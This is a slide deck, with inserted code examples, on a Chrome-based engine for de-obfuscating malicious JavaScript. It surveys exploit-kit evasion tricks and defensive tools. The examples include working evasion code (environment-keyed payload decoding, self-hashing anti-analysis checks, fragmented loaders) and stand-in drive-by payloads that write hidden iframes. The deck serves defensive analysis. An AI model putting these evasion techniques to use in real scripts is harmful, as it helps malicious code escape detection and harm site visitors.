JavaScript De-Obfuscation Engine (JDOE)
Nick Guo, Ulysses Wang
Agenda
• Obfuscation Introduction
• Anti de-obfuscation
• Browser Knowledge
• Current Solution
• JDOE
• Demo
• Challenge & Improvement
Obfuscation Introduction (Phase I Review)
Obfuscation
• Concealing the intent of code by making it difficult for human analysis and automated detection
• Copyright protection
• Hiding information (e.g. an email address)
• Evading detection
Obfuscation Types
• Three types of obfuscation:
  – Injection obfuscation
  – Public packer obfuscation
  – Exploit kit obfuscation
Obfuscation Types
• "As recorded in 2007, over 80% of detected malicious code was already using obfuscation"
• Most obfuscations are simple: injection 83%, exploit kit <1%
• Complex obfuscations are a small proportion of the total, but obfuscation is becoming more complex
Anti de-obfuscation (JDOE Prototype)
Fragmentation
• Splitting important code into pieces of JavaScript, HTML or external scripts
• String concatenation
  – var temp = "get" + "Elem" + "ent" + "By" + "Id"
• Tag concatenation
  – Put content in <div>, <p>, <textarea>
  – Open Source Exploit Kit
Fragmentation
• File concatenation
  – Put critical functions or data in another file
  – Phoenix Exploit Kit 2.5
• Traffic concatenation
  – Keep data on the server; the client has to request it at run time
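To make the three concatenation tricks concrete, here is an added example (not from the JDOE slides or from any of the kits named above) of a loader that keeps its payload as string, tag and file fragments, and of the reassembly step a de-obfuscator has to let run before it sees anything. The document object, the "external file" and the payload are constructed stand-ins; the method name is built the way the slide shows.

```javascript
// Added example: fragmented loader and its reassembly. Everything here is
// constructed for illustration; none of it is JDOE code.

// Constructed stand-in for `document`: the attacker hid pieces of the payload
// in the text of ordinary-looking tags (tag concatenation).
const fakeDocument = {
  nodes: {
    p1: { tagName: "DIV",      textContent: "alert(" },
    p2: { tagName: "P",        textContent: "'frag" },
    p3: { tagName: "TEXTAREA", textContent: "mented')" },
  },
  getElementById(id) { return this.nodes[id] || null; },
};

// Constructed stand-in for a second script file (file concatenation): in a
// real kit this is a separate .js fetched from the kit's server, so the page
// alone never contains the assembly order.
const externalFile = { order: ["p1", "p2", "p3"] };

// String concatenation: the API name never appears as one literal, so a
// signature for "getElementById" over the page source matches nothing.
function hiddenApiName() {
  return "get" + "Elem" + "ent" + "By" + "Id";
}

// Reassemble the payload. Bracket notation with the computed name is what the
// obfuscated loader does; a static scanner only ever sees the separate pieces.
function reassemble(doc, order) {
  const getter = hiddenApiName();
  let code = "";
  for (const id of order) {
    const node = doc[getter](id);
    if (!node) throw new Error("missing fragment " + id);
    code += node.textContent;
  }
  return code;
}

// What an emulator observes: the final string the loader hands to eval().
// This is the point where hooking eval (rather than pattern matching) pays off.
function observedPayload() {
  return reassemble(fakeDocument, externalFile.order);
}

console.log(observedPayload()); // alert('fragmented')
```

Note that `reassemble` only works once the tags exist in a DOM and the order list has been fetched, which is why a tool with weak DOM support or with external access disabled stops at the fragments.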
External Access
• Fetch an external resource or perform a connection check
• Ajax fetch of data
• Connection check
  – Neosploit exploit kit
Condition check
• Browser detection
  uas = navigator.userAgent;
  while (uai < uas.length) { xor += uas.charCodeAt(uai++); }
  – IE 6
  – Firefox
Condition check
• Time check
  – getUTCFullYear()
  – getUTCMonth()
  – getUTCDate()
• Plugin check
  – new ActiveXObject('ShockwaveFlash'); (IE)
  – Check navigator.plugins (not IE)
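The user-agent loop on the slide is usually more than a check: the sum it produces becomes the decryption key. The added example below (not from the JDOE slides; the target UA, date window, ProgID handling and payload are all constructed) combines the three condition checks into a gate plus a keyed decode, so an emulator with a fake navigator, the wrong clock or no plugin never produces the real payload.

```javascript
// Added example: environment-keyed staging. Constructed for illustration,
// not JDOE code and not from any real kit.

// The loop from the slide, unchanged: sum the char codes of navigator.userAgent.
function uaKey(userAgent) {
  var xor = 0, uai = 0;
  while (uai < userAgent.length) { xor += userAgent.charCodeAt(uai++); }
  return xor;
}

// Symmetric XOR with the low byte of the key. A wrong UA raises no error,
// it just yields garbage, so a mis-emulated sandbox has nothing useful to log.
function xorWithKey(text, key) {
  const k = key & 0xff;
  let out = "";
  for (let i = 0; i < text.length; i++) out += String.fromCharCode(text.charCodeAt(i) ^ k);
  return out;
}

// Browser detect: this constructed kit only serves IE 6.
function browserOk(userAgent) { return /MSIE 6\.0/.test(userAgent); }

// Time check with the getUTC* calls from the slide (month is 0-based).
function dateOk(now, year, month, dayMin, dayMax) {
  return now.getUTCFullYear() === year && now.getUTCMonth() === month &&
         now.getUTCDate() >= dayMin && now.getUTCDate() <= dayMax;
}

// Plugin check: ActiveXObject on IE, navigator.plugins elsewhere.
function hasFlash(win) {
  if (typeof win.ActiveXObject === "function") {
    try { new win.ActiveXObject("ShockwaveFlash"); return true; } catch (e) { return false; }
  }
  const plugins = (win.navigator && win.navigator.plugins) || [];
  for (let i = 0; i < plugins.length; i++) if (/Flash/.test(plugins[i].name)) return true;
  return false;
}

// Gate plus keyed decode. null means "not the target", which is all a badly
// configured emulator ever gets back.
function stage(win, now, encoded) {
  const ua = win.navigator.userAgent;
  if (!browserOk(ua)) return null;
  if (!dateOk(now, 2011, 9, 1, 31)) return null;   // October 2011 (constructed window)
  if (!hasFlash(win)) return null;
  return xorWithKey(encoded, uaKey(ua));
}

// Constructed sample, "compiled" for this IE 6 UA.
const TARGET_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
const PAYLOAD = "document.write('<iframe src=\"//example.invalid/ie6\" width=1 height=1></iframe>')";
const ENCODED = xorWithKey(PAYLOAD, uaKey(TARGET_UA));

function ie6Window() {
  return {
    navigator: { userAgent: TARGET_UA, plugins: [] },
    // Stand-in for IE's ActiveX factory: only the Flash ProgID "exists".
    ActiveXObject: function (progId) { if (progId !== "ShockwaveFlash") throw new Error("no such control"); },
  };
}
function firefoxWindow() {
  return { navigator: { userAgent: "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0",
                        plugins: [{ name: "Shockwave Flash" }] } };
}
```

The practical consequence for an engine like JDOE is that the emulated `navigator`, `Date` and plugin objects have to be correct to the character: a UA string that differs by one trailing space changes the key and the decode silently fails.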
Trigger Function
• Trigger a function after a certain number of seconds
  – setTimeout("alert('Hello!')", 3000)
  – setInterval("clock()", 1000)
• Trigger a function on a certain event
  – <body onload="load()">
  – <button id="j_id" onclick="j_function2();">
  – window.attachEvent or addEventListener
• Trigger a function from a plugin
  – Call a JS function from ActionScript
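An emulator cannot wait three real seconds or for a user to click, so it has to take over the trigger APIs above and fire the registered callbacks itself. The added example below (not JDOE code; `makeWindow` is a constructed stand-in for the browser's global object, and virtual time is simplified to "run everything once, in delay order") shows the hooks for both timer functions and both event registration APIs.

```javascript
// Added example: forcing timer and event triggers in an emulated window.
// Constructed for illustration; this is not the JDOE implementation.

function makeWindow() {
  const win = { executed: [], deferred: [], listeners: {} };

  // Timers: record the callback and its delay instead of scheduling it.
  // String arguments are compiled the way the browser would evaluate them,
  // with the window as scope so alert()/clock() resolve.
  const defer = (kind) => (fn, ms) => {
    const cb = typeof fn === "string"
      ? new Function("win", "with (win) { " + fn + " }")
      : fn;
    win.deferred.push({ kind, ms: Number(ms) || 0, cb });
    return win.deferred.length;   // timer id
  };
  win.setTimeout = defer("setTimeout");
  win.setInterval = defer("setInterval");

  // Both registration styles: DOM addEventListener and IE attachEvent("onload").
  win.addEventListener = (name, fn) =>
    (win.listeners[name] = win.listeners[name] || []).push(fn);
  win.attachEvent = (name, fn) => win.addEventListener(name.replace(/^on/, ""), fn);

  // What the payload calls once it finally runs.
  win.alert = (msg) => win.executed.push("alert:" + msg);
  return win;
}

// Fire the load event, then every deferred callback in order of delay.
// Intervals run once: one tick of virtual time is enough to see the payload.
function runTriggers(win) {
  for (const fn of win.listeners.load || []) fn();
  const pending = win.deferred
    .map((d, i) => ({ ...d, i }))
    .sort((a, b) => a.ms - b.ms || a.i - b.i);
  for (const d of pending) d.cb(win);
  return win.executed;
}

// Constructed sample using the exact calls from the slide.
function sample(win) {
  win.setTimeout("alert('Hello!')", 3000);
  win.setInterval("clock()", 1000);
  win.clock = function () { win.alert("tick"); };
  win.addEventListener("load", function () { win.alert("load"); });
  win.attachEvent("onload", function () { win.alert("ie-load"); });
}

function runTriggerSample() {
  const win = makeWindow();
  sample(win);
  return runTriggers(win);
}

console.log(runTriggerSample()); // [ 'alert:load', 'alert:ie-load', 'alert:tick', 'alert:Hello!' ]
```

Plugin-originated triggers (ActionScript calling back into JavaScript) are the one case this pattern does not cover, which is why the slides list a SWF parser as future work.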
Bypass de-obfuscation tool
• Uncommon tags
• Save content in CSS
• Modification check
  – var hybxs = arguments.callee; hybxs = hybxs.toString();
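The `arguments.callee.toString()` line is a self-integrity check: the loader derives its decryption key from its own source text, so a tool that rewrites `eval` into a print call, or inserts a hook, changes the key and the decode fails. The added example below (not from the slides; hash, XOR scheme and payload are constructed, and a named reference replaces `arguments.callee` because strict mode and module code forbid it) shows the check and what an instrumented copy of the loader gets back.

```javascript
// Added example: source-keyed decoding ("modification check"). Constructed
// for illustration; not JDOE code and not taken from a real sample.

// 32-bit hash over source text. Any edit (an inserted console.log, a renamed
// eval, even reformatting) changes it.
function sourceKeyOf(src) {
  let h = 0;
  for (let i = 0; i < src.length; i++) h = (Math.imul(h, 31) + src.charCodeAt(i)) >>> 0;
  return h;
}

// XOR each char with a rotating byte of the 32-bit key; symmetric, so the
// same function encodes and decodes.
function xorCrypt(text, key) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const kb = (key >>> (8 * (i % 4))) & 0xff;
    out += String.fromCharCode(text.charCodeAt(i) ^ kb);
  }
  return out;
}

// The loader keys the decode on its own source. The slide uses
// arguments.callee; `loader` is the same function object.
function loader(encoded) {
  var hybxs = loader;            // arguments.callee on the slide
  hybxs = hybxs.toString();
  return xorCrypt(encoded, sourceKeyOf(hybxs));
}

// Constructed payload, encoded against the key of the untouched loader.
const PAYLOAD = "document.write('<script src=\"//example.invalid/s.js\"></script>')";
const ENCODED = xorCrypt(PAYLOAD, sourceKeyOf(loader.toString()));

// What an analyst's rewrite does: a tool that turns the decode into a logging
// call has edited the source, so the key derived from it no longer matches.
function instrumentedKey() {
  const patched = loader.toString().replace("return xorCrypt(", "return log_and_xorCrypt(");
  return sourceKeyOf(patched);
}
function decodeWithInstrumentedKey() {
  return xorCrypt(ENCODED, instrumentedKey());
}

console.log(loader(ENCODED) === PAYLOAD);                  // true
console.log(decodeWithInstrumentedKey() === PAYLOAD);      // false
```

This is the argument for hooking at the engine level (a replaced `eval` inside V8 or SpiderMonkey) rather than rewriting the sample's text: `Function.prototype.toString` still returns the untouched source, and the check passes.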
Browser Knowledge (JDOE Prototype)
Browser Component
Webkit
DOM Tree
Current Solution (Phase I Review)
Jsunpack
• Lightweight: SpiderMonkey and Python
• Sets hooks in the JS file
• Environment DOM enumeration
• Detection module (YARA)
• PDF and SWF parser
• Intrusion detection (libnids)
• http://jsunpack.jeek.org/
Fireshark
• Firefox plugin
• Main window and child frame source code
• Main window and child frame DOM tree
• HTTP requests and responses logged
• Malicious URL check
• URL redirection graph
• http://fireshark.org/
Malzilla
• Research tool
• SpiderMonkey
• Shellcode analysis
• Limited DOM support
• http://malzilla.sourceforge.net/
Limitations
• Firefox based
• Limited DOM support
• Limited de-obfuscation
• Performance
JDOE (Phase I Review)
JDOE
• What engine do we want?
  – High performance
  – Good coverage
  – Good output and log formats
  – Analytics platform
JDOE
• JDOE is based on Google Chrome
• Render engine: WebKit
  – 85% of the smartphone browser market
  – 21% of the desktop browser market
  – Includes the DOM tree and parser
• JavaScript engine: V8
Prototyping
• JDOE is based on a test project for Chrome
• Command-line tool, feasible to port as a server-side application
• Able to simulate basic browser functions
• Full DOM support
• Good fault tolerance for malformed HTML
• HTML-format output
JDOE Architecture
JDOE advantages
• Based on Chrome and WebKit
• Strong parser
• Full DOM support
• Fast JS execution
• High coverage
• Good extensibility
De-obfuscation Method
• JDOE de-obfuscation method
• Hook eval()
  – Captures the inner state of the JavaScript as each stage is decoded
• Print the final DOM tree
  – Captures the final state
  – document.write adds nodes to the DOM tree, so written content appears in the dump
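The two observation points named above, a hooked `eval()` and a dump of the DOM after `document.write`, are shown in the added example below around a constructed two-stage loader. This is not JDOE's own code: the mini-DOM stands in for WebKit, the hex decoder stands in for whatever `unescape`/`fromCharCode` chain a real sample carries, and the iframe target is a placeholder.

```javascript
// Added example: eval hook plus final-DOM dump in a constructed sandbox.
// Illustration only; not the JDOE implementation.

function makeSandbox() {
  const sb = { evalLog: [], nodes: [] };

  // document.write appends to the tree instead of rendering. A real engine
  // parses the HTML; for de-obfuscation the written text is the result.
  sb.document = { write(html) { sb.nodes.push(String(html)); } };

  // The sample's own decoder (stand-in for unescape/fromCharCode chains).
  sb.fromHex = (h) => h.replace(/../g, (b) => String.fromCharCode(parseInt(b, 16)));

  // eval hook: log every string that reaches eval, then run it in a scope whose
  // eval is this same hook, so nested stages are logged as they are decoded.
  sb.eval = function hookedEval(code) {
    const src = String(code);
    sb.evalLog.push(src);
    return new Function("document", "eval", "fromHex", src)(sb.document, sb.eval, sb.fromHex);
  };
  return sb;
}

// "Print the final DOM tree": the serialized result after all writes.
function finalDom(sb) {
  return "<html><body>" + sb.nodes.join("") + "</body></html>";
}

function toHex(s) {
  let h = "";
  for (let i = 0; i < s.length; i++) h += s.charCodeAt(i).toString(16).padStart(2, "0");
  return h;
}

// Constructed sample: stage 1 decodes and evals stage 2, which writes an iframe.
function runTwoStageSample() {
  const sb = makeSandbox();
  const stage2 = "document.write(\"<iframe src='//example.invalid/landing' width=1 height=1></iframe>\");";
  const stage1 = "eval(fromHex('" + toHex(stage2) + "'));";
  sb.eval(stage1);
  return sb;
}

const result = runTwoStageSample();
console.log(result.evalLog.length);   // 2: stage 1, then the decoded stage 2
console.log(finalDom(result));        // <html><body><iframe src='//example.invalid/landing' ...></body></html>
```

The eval log gives the per-stage view (useful for signatures on the decoded code); the DOM dump gives the end state (useful for extracting the landing URL). A sample that writes a `<script src>` instead of an iframe would need the fetched script run through the same hook, which is where the "disable external access" trade-off on the Challenge slide comes in.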
Exploit kit Coverage
• Exploit kit samples
  – Samples from the Top 10 exploit kits project
  – Total samples: 22
  – JDOE success: 20 (91%)
  – JDOE failed: 2 (9%)
  – Coverage: 90.9%
Injection Coverage
• Injection samples
  – Samples from obfuscation ThreatID matches
  – Total samples: 9,544
  – JDOE success: 8,450 (89%)
  – JDOE failed: 1,094 (11%)
  – Coverage: 88.5%
Demo
Challenge & Improvement (Status and Next Step)
Challenge
• Security: how to keep the JDOE server secure?
  – Upgrade plan
  – Sandbox
  – JavaScript audit
• Performance
  – Disable external access
• Coverage
  – Special samples not supported
  – Output format defective on special samples
Improvement
• More trigger function handlers
• PDF and SWF parser
• Shellcode detection
• JavaScript audit
• Cloud-based integration
  – http://aceinsight.websense.com/
  – Auto analysis platform
JDOE
Questions?